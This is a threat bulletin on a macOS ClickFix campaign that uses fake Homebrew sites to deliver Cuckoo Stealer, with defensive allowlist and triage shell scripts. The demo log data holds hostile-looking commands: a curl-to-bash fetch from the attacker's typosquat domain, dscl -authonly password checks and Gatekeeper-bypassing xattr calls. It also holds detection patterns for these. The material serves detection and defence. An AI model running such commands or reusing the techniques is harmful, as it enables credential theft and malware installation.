Current Cyber Threats

Fake Homebrew Typosquats Used to Deliver Cuckoo Stealer via ClickFix

Summary:
A macOS-focused campaign is actively targeting developers and system administrators with the ClickFix execution technique. The actors host convincing typosquatted domains that impersonate Homebrew, the popular macOS package manager. The fake sites' "Copy to clipboard" button silently replaces the legitimate installation URL with a malicious one, so the victim runs the attacker's command in Terminal themselves. The infection chain delivers a two-stage payload: a credential-harvesting shell script, followed by a full-featured macOS infostealer and Remote Access Trojan (RAT) dubbed Cuckoo Stealer. The threat is a significant risk to organizational environments because it silently siphons high-value data, including macOS Keychains, Chromium browser data, Discord and Telegram session tokens, secure notes, VPN configurations and cryptocurrency wallets, while evading detection and bypassing Gatekeeper warnings.

Security Officer Comments:
The attack begins when a user lands on a typosquatted domain that closely replicates the visual design and multi-language support of the legitimate brew[.]sh website. When the user clicks the "Copy" button to grab the installation command, JavaScript silently modifies the clipboard content: instead of fetching the script from the legitimate raw.githubusercontent[.]com, the copied command points to an attacker-controlled subdomain (raw.homabrews[.]org). Because developers are conditioned to copy and paste the standard curl -fsSL installation one-liner without reading it, the domain swap often goes unnoticed.

Pasting the command into Terminal executes the first-stage credential-harvesting shell script. The attackers inject their code into an otherwise authentic Homebrew install script to preserve a veil of legitimacy. The harvesting phase runs in a while loop that exploits prompt fatigue: a fake authentication dialogue is shown again and again until the user submits a valid password. Each submission is validated with the macOS Directory Services command-line tool, dscl, using the -authonly verb, which checks a username and password against the local directory without creating a login session or triggering the usual authentication logging. Once a valid password is confirmed, the script downloads a second-stage binary (brew_agent) to /tmp and passes the stolen password to it as a Base64-encoded argument, so the second stage can use it immediately for privileged operations.
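The clipboard swap works because nobody reads the one-liner before running it. The script below is an added example, not code from the hunt.io report or from the Homebrew project: it extracts every URL from a copied command and accepts the command only if each host matches an allowlist exactly, so look-alike hosts such as raw.homabrews.org or raw.githubusercontent.com.evil.example are rejected. The ALLOWED_HOSTS list is an assumed policy for the demo; the usage line with pbpaste is how it would be wired in on macOS.

```shell
#!/bin/sh
# Added example, not code from hunt.io's report or the Homebrew project.
# Pre-paste check for installer one-liners: every URL in the command must
# point at an allowlisted host, compared as a whole hostname so that
# look-alikes (raw.homabrews.org, raw.githubusercontent.com.evil.example)
# are rejected. ALLOWED_HOSTS is an assumed policy; adjust it for your org.
ALLOWED_HOSTS="raw.githubusercontent.com github.com"

# host_of URL -> prints the bare hostname (scheme, port and path removed)
host_of() {
    printf '%s\n' "$1" | sed -E 's#^[A-Za-z]+://##; s#[/:].*$##'
}

# check_install_cmd "<command string>"
#   exit 0: every URL host is allowlisted
#   exit 1: at least one host is not (details on stderr)
#   exit 2: no URL found in the command
check_install_cmd() {
    cmd=$1
    # pull out every http(s) URL; '|| true' keeps a no-match from aborting under set -e
    urls=$(printf '%s\n' "$cmd" | grep -oE 'https?://[^"'"'"' )]+' || true)
    [ -n "$urls" ] || return 2
    rc=0
    for u in $urls; do
        h=$(host_of "$u")
        ok=1
        for a in $ALLOWED_HOSTS; do
            if [ "$h" = "$a" ]; then ok=0; fi
        done
        if [ "$ok" -ne 0 ]; then
            printf 'REJECT: %s (host %s is not allowlisted)\n' "$u" "$h" >&2
            rc=1
        fi
    done
    return "$rc"
}

# On macOS, run this against the clipboard before pasting into Terminal:
#   sh check_install.sh "$(pbpaste)"
if [ "$#" -gt 0 ]; then
    check_install_cmd "$*"
fi
```

Whole-host comparison is the point: a suffix or substring match on "githubusercontent.com" would pass the subdomain trick, and a scheme check alone passes every typosquat.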

The second-stage payload, Cuckoo Stealer, is a full-featured infostealer and RAT. On execution it generates a unique session ID and removes the com.apple.quarantine extended attribute from itself with the xattr command; without that attribute Gatekeeper no longer inspects the binary, so subsequent launches produce no security warning. It reads the first five characters of the LANG environment variable (for example ru_RU) and refuses to run in Commonwealth of Independent States (CIS) locales. Persistence is user-level, through a macOS LaunchAgent: the malware writes com.homebrew.brewupdater.plist to the user's LaunchAgents directory and drops its binary as BrewUpdater in a hidden directory, masquerading as a Homebrew component. It communicates over HTTPS using libcurl.

Suggested Corrections:
IOCs: https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos#Indicators_of_Compromise

  • Immediately block 5.255.123[.]244 and all associated typosquat/ClickFix domains at the firewall and DNS levels.
  • Query EDR/SIEM telemetry for curl invocations with the -fsSL flags whose output is piped to or evaluated by bash, where the URL host is unusual or unauthorized.
  • Scan macOS endpoints for com.homebrew.brewupdater.plist in user LaunchAgents directories (~/Library/LaunchAgents), and for hidden folders matching the .local-* naming convention that contain the BrewUpdater binary.
  • Alert on dscl -authonly usage (indicative of password-checking loops) and on xattr -c or xattr -d being used to strip com.apple.quarantine from downloaded binaries.
  • Hunt for automated AppleScript executions targeting sensitive directories such as ~/Library/Keychains or ~/Library/Group Containers/group.com.apple.notes/.
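The host and log checks in the list above, as an added example that is not part of the hunt.io report or the Homebrew project: hunt_home looks for the persistence plist and for a BrewUpdater binary inside a hidden .local-* directory, and hunt_log greps a one-command-per-line log (an EDR process export or shell history) for dscl -authonly, quarantine-stripping xattr calls, and curl -fsSL fetches from any host other than raw.githubusercontent.com. Assumptions: the hidden directory sits within three levels of the home directory (the report gives no exact location), and the log format is the constructed one written by build_demo; the demo tree, timestamps and password values are invented.

```shell
#!/bin/sh
# Added example, not code from hunt.io's report or the Homebrew project.
# Host triage for the artefacts above: (1) the LaunchAgent plist and the
# BrewUpdater binary in a hidden .local-* directory, (2) dscl -authonly,
# quarantine-stripping xattr calls and curl -fsSL from unexpected hosts in
# a command log. Assumed: the hidden directory is within three levels of
# the home directory; the log is one command per line. Demo data is constructed.

# hunt_home HOME_DIR -> prints one "FINDING ..." line per artefact
hunt_home() {
    home=$1
    plist="$home/Library/LaunchAgents/com.homebrew.brewupdater.plist"
    if [ -f "$plist" ]; then
        printf 'FINDING persistence plist: %s\n' "$plist"
    fi
    find "$home" -maxdepth 3 -type d -name '.local-*' 2>/dev/null |
    while IFS= read -r d; do
        if [ -f "$d/BrewUpdater" ]; then
            printf 'FINDING dropped binary: %s\n' "$d/BrewUpdater"
        fi
    done
    return 0
}

# hunt_log LOGFILE -> prints one "FINDING ..." line per suspicious command
hunt_log() {
    log=$1
    # password-check loop: dscl ... -authonly <user> <password>
    grep -nE 'dscl .*-authonly' "$log" | sed 's/^/FINDING dscl authonly: /'
    # Gatekeeper evasion: xattr -c (clears all attrs) or xattr -d com.apple.quarantine
    grep -nE 'xattr +(-c|-d +com\.apple\.quarantine)' "$log" | sed 's/^/FINDING quarantine strip: /'
    # curl -fsSL fetching from anywhere other than the real Homebrew host
    grep -nE 'curl +-fsSL +https?://' "$log" \
        | grep -vE 'https?://raw\.githubusercontent\.com/' \
        | sed 's/^/FINDING curl from unexpected host: /'
    return 0
}

# build_demo -> creates a throwaway home tree plus a constructed log, prints its root
build_demo() {
    root=$(mktemp -d)
    mkdir -p "$root/home/Library/LaunchAgents" "$root/home/.local-a1b2c3"
    : > "$root/home/Library/LaunchAgents/com.homebrew.brewupdater.plist"
    : > "$root/home/.local-a1b2c3/BrewUpdater"
    # constructed log lines (time, user, command); passwords are invented
    printf '%s\n' \
      '10:00:01 dev /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"' \
      '10:05:12 dev /bin/bash -c "$(curl -fsSL https://raw.homabrews.org/Homebrew/install/HEAD/install.sh)"' \
      '10:05:40 dev dscl . -authonly dev wrongpass1' \
      '10:05:41 dev dscl . -authonly dev wrongpass2' \
      '10:05:42 dev dscl . -authonly dev hunter2' \
      '10:05:55 dev xattr -c /tmp/brew_agent' \
      '10:06:02 dev xattr -d com.apple.quarantine /Users/dev/.local-a1b2c3/BrewUpdater' \
      '10:07:00 dev ls -la /Users/dev/Library/Keychains' \
      > "$root/cmd.log"
    printf '%s\n' "$root"
}

# Usage: triage.sh HOME_DIR LOGFILE; with no arguments it runs on the demo data.
if [ "$#" -eq 2 ]; then
    hunt_home "$1"
    hunt_log "$2"
else
    root=$(build_demo)
    hunt_home "$root/home"
    hunt_log "$root/cmd.log"
    rm -rf "$root"
fi
```

Against the demo data the run reports the plist, the BrewUpdater binary, the three consecutive dscl -authonly attempts (the prompt-fatigue loop is visible as a burst of these from one user), both xattr variants, and only the curl fetch from the typosquat host; the legitimate raw.githubusercontent.com fetch and the Keychains listing produce nothing. On a real fleet, feed hunt_log the EDR process-execution export for each Mac and treat any dscl -authonly burst as a page-worthy event.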

General Best Practices:

  • Mandate that developers and system administrators paste copied terminal commands into a plain text editor for visual inspection before executing them in the terminal.
  • Educate technical staff on the mechanics of ClickFix attacks, emphasizing that search engine poisoning and typosquatting target technical workflows.
  • Ensure multi-factor authentication and strict session lifetimes are enforced across VPNs and organizational SSO to mitigate the impact of stolen session tokens and credentials.
  • Restrict the execution of unverified scripts and consider implementing centralized, IT-managed software deployment mechanisms to replace ad-hoc curl | bash developer installations.

Link(s):
https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos